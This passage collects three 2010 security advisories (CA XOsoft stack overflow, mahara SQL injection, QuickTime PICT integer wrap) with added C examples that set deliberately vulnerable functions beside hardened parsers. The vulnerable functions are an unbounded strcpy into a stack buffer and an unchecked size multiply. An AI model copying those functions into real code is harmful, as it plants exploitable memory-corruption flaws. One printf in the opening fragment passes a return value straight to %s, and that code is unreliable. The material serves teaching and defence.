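    /* Constructed inputs: a client at the supported version and a newer one. */
    printf("fixed, api 2: %s\n", ex_init_fixed(2) ? "error" : "ok");
    printf("fixed, api 3: %s\n", ex_init_fixed(3));
    printf("vulnerable, api 2: %s\n", ex_init_vulnerable(2) ? "error" : "ok");
    return 0;
}
```

The point the example makes is that a NULL check is not a liveness check: a pointer that has been passed to free() keeps its old value, so `h ? h->context : NULL` happily dereferences it. The fix has to change the order of operations (report, then release) or stop reaching through the handle at all, which is what passing NULL does.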
ZDI-10-066: CA XOsoft Control Service entry_point.aspx Remote Code Execution Vulnerability
ZDI-10-066: CA XOsoft Control Service entry_point.aspx Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-066
April 6, 2010

-- CVE ID:
CVE-2010-1223

-- Affected Vendors:
Computer Associates

-- Affected Products:
Computer Associates XOsoft High Availability
Computer Associates XOsoft Replication

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9493. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Computer Associates XOsoft Control Replication and High Availability Control Service. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the /entry_point.aspx service and occurs due to an unbounded string copy using a user-controlled string as the source into a fixed-length buffer located on the stack. Successful exploitation can lead to code execution in the context of the service.

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability. More details can be found at:

    https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=232869

-- Disclosure Timeline:
2009-12-16 - Vulnerability reported to vendor
2010-04-06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Andrea Micalizzi aka rgod
    * AbdulAziz Hariri
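ZDI-10-062 (NWFTPD: overly long RMD/RNFR/DELE arguments overflow a stack buffer) and ZDI-10-066 (entry_point.aspx: an unbounded copy of a user-controlled string into a fixed-length stack buffer) are the same bug class seen through two protocols. The C program below is an added example of that pattern beside the parser that should have been there; it is not code from Novell, CA or the ZDI, and nothing in it reflects the real servers' internals. The buffer sizes, the reply codes returned by `handle_line`, and the sample commands are assumptions made for the example, and the verb handling goes slightly beyond the advisories by also rejecting malformed verbs.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define VERB_MAX     8    /* assumed: FTP verbs are a few letters; room for NUL */
#define PATH_BUF_MAX 256  /* assumed size of the server's fixed stack buffer    */

/* Vulnerable pattern, the bug class in both advisories: the argument that
 * followed RMD/RNFR/DELE (or the user-controlled string in entry_point.aspx)
 * is copied into a fixed-size stack buffer with no length check. It is here
 * only to show the shape and must never see untrusted input. */
void handle_rmd_unbounded(const char *arg)
{
    char path[PATH_BUF_MAX];
    strcpy(path, arg);                 /* overflows when strlen(arg) >= PATH_BUF_MAX */
    printf("RMD %s\n", path);
}

typedef enum { FTP_OK = 0, FTP_SYNTAX, FTP_NO_ARG, FTP_ARG_TOO_LONG } ftp_status;

/* Hardened parser: split "VERB<SP>argument<CRLF>" and copy the argument only
 * when it fits the caller's buffer with room for the terminator. */
ftp_status parse_ftp_command(const char *line, char *verb, size_t verb_sz,
                             char *arg, size_t arg_sz)
{
    size_t len = strlen(line);
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                                          /* strip CRLF */

    size_t i = 0;
    while (i < len && isalpha((unsigned char)line[i]))
        i++;                                            /* verb = leading letters */
    if (i == 0 || i >= verb_sz)
        return FTP_SYNTAX;
    for (size_t k = 0; k < i; k++)
        verb[k] = (char)toupper((unsigned char)line[k]);
    verb[i] = '\0';

    if (i == len) { arg[0] = '\0'; return FTP_NO_ARG; }
    if (line[i] != ' ')
        return FTP_SYNTAX;
    i++;

    size_t alen = len - i;
    if (alen == 0) { arg[0] = '\0'; return FTP_NO_ARG; }
    if (alen >= arg_sz)
        return FTP_ARG_TOO_LONG;                        /* the check strcpy never made */
    memcpy(arg, line + i, alen);
    arg[alen] = '\0';
    return FTP_OK;
}

/* Server-side dispatch for the three verbs named in ZDI-10-062. Returns the
 * numeric FTP reply: 500 syntax error, 501 bad parameter, 502 verb not
 * implemented here, 250 accepted (where a real server would act on path). */
int handle_line(const char *line)
{
    char verb[VERB_MAX], path[PATH_BUF_MAX];
    ftp_status st = parse_ftp_command(line, verb, sizeof verb, path, sizeof path);
    if (st == FTP_SYNTAX)
        return 500;
    if (strcmp(verb, "RMD") != 0 && strcmp(verb, "RNFR") != 0 && strcmp(verb, "DELE") != 0)
        return 502;
    if (st != FTP_OK)
        return 501;          /* missing or over-long argument: refused, never copied */
    return 250;
}

/* Constructed input helper: "RMD " followed by n bytes of 'A', then CRLF. */
int reply_for_arg_length(size_t n)
{
    char buf[4 + 1024 + 3];
    if (n > 1024)
        return -1;
    memcpy(buf, "RMD ", 4);
    memset(buf + 4, 'A', n);
    memcpy(buf + 4 + n, "\r\n", 3);
    return handle_line(buf);
}

int main(void)
{
    const char *samples[] = { "RMD /pub/incoming\r\n", "rnfr old.txt\r\n",
                              "DELE\r\n", "SYST\r\n", "123 abc\r\n" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("sample %zu -> %d\n", i, handle_line(samples[i]));
    printf("RMD + 255 bytes -> %d\n", reply_for_arg_length(255));
    printf("RMD + 256 bytes -> %d\n", reply_for_arg_length(256));
    printf("RMD + 600 bytes -> %d\n", reply_for_arg_length(600));
    handle_rmd_unbounded("/tmp/short");   /* safe only because this input is short */
    return 0;
}
```

The length test sits in the parser, before any copy, and the caller passes the real size of its buffer rather than a constant that can drift from it. That is the whole difference between the two code paths: the unbounded version trusts the wire to respect a limit it never announced, the bounded one enforces the limit and answers with an error reply instead.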
[SECURITY] [DSA 2030-1] New mahara packages fix sql injection
------------------------------------------------------------------------
Debian Security Advisory DSA-2030-1                  secur...@debian.org
http://www.debian.org/security/                               Nico Golde
April 6th, 2010                       http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : mahara
Vulnerability  : sql injection
Problem type   : remote
Debian-specific: no
Debian bug     : none
CVE ID         : CVE-2010-0400

It was discovered that mahara, an electronic portfolio, weblog, and resume builder, does not properly escape input when generating a unique username based on a remote user name from a single sign-on application. An attacker can use this to compromise the mahara database via crafted user names.

For the stable distribution (lenny), this problem has been fixed in version 1.0.4-4+lenny5.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in version 1.2.4-1.

We recommend that you upgrade your mahara packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny (stable)
-----------------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny5.diff.gz
    Size/MD5 checksum:    40648 cd057351de5462d5e1df2d75bf3f2247
  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny5.dsc
    Size/MD5 checksum:     1304 e87fa2a0e67a71eef479be5a5da65894
  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4.orig.tar.gz
    Size/MD5 checksum:  2383079 cf1158e4fe3cdba14fb1b71657bf8cc9

Architecture independent packages:

  http://security.debian.org/pool/updates/main/m/mahara/mahara-apache2_1.0.4-4+lenny5_all.deb
    Size/MD5 checksum:     8106 5b0910999a1bfdfbce8740219d9549dc
  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny5_all.deb
    Size/MD5 checksum:  1662742 289da5fba44237ff1c17a462cb6cd9f7

  These files will probably be moved into the stable distribution on its next update.

------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
ZDI-10-067: Apple QuickTime Pict BkPixPat Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-067
April 6, 2010

-- CVE ID:
CVE-2010-0529

-- Affected Vendors:
Apple

-- Affected Products:
Apple QuickTime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9568. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the primary QuickTime.qts library when parsing the BkPixPat opcode (0x12) within a PICT file. The application multiplies two fields read from the file and passes the product as the size argument to an allocation. As both operands of the multiply are user-controllable, specific values make the product wrap, causing an under-allocation that later results in a heap overflow. Successful exploitation can lead to code execution under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:

    http://support.apple.com/kb/HT4104

-- Disclosure Timeline:
2009-11-06 - Vulnerability reported to vendor
2010-04-06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Damian Put

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

    http://twitter.com/thezdi
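ZDI-10-067 describes a multiply-then-allocate size computation whose operands both come from the file. The following is an added model of that bug class, not Apple's QuickTime code: the field names rowBytes and height and the 32-bit width of the size arithmetic are assumptions (the advisory does not state the field widths), chosen so the wrap is observable.

```c
/* Added example, not QuickTime code. Two file-controlled pixmap fields
 * (assumed: rowBytes and height) are multiplied to size a heap buffer;
 * the arithmetic is modelled as 32-bit so the product can wrap. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Vulnerable pattern: the product wraps modulo 2^32 when it exceeds
 * UINT32_MAX, so the buffer allocated from it is far smaller than the
 * pixel data later written into it (the heap overflow). */
uint32_t pixmap_size_unchecked(uint32_t row_bytes, uint32_t height)
{
    return row_bytes * height;          /* silent wrap on overflow */
}

/* Hardened form: reject the record when the product would not fit in
 * 32 bits, and when either operand is zero (a zero-byte buffer would
 * still be indexed by the row loop). Returns 0 on rejection. */
uint32_t pixmap_size_checked(uint32_t row_bytes, uint32_t height)
{
    if (row_bytes == 0 || height == 0)
        return 0;
    if (row_bytes > UINT32_MAX / height)
        return 0;                       /* product would wrap: reject */
    return row_bytes * height;          /* now known not to overflow */
}

/* Allocation wrapper: malloc() only ever sees a validated size. */
void *pixmap_alloc(uint32_t row_bytes, uint32_t height)
{
    uint32_t size = pixmap_size_checked(row_bytes, height);
    return size ? malloc(size) : NULL;
}

int main(void)
{
    /* Constructed field values: 0x10000 * 0x10001 = 2^32 + 0x10000,
     * which a 32-bit multiply reduces to 0x10000 (64 KiB). */
    uint32_t rb = 0x10000u, h = 0x10001u;
    printf("unchecked size: %u bytes\n", pixmap_size_unchecked(rb, h));
    printf("checked size:   %u (0 = rejected)\n", pixmap_size_checked(rb, h));
    void *ok = pixmap_alloc(1024u, 768u);
    printf("1024x768 alloc: %s\n", ok ? "ok" : "failed");
    free(ok);
    return 0;
}
```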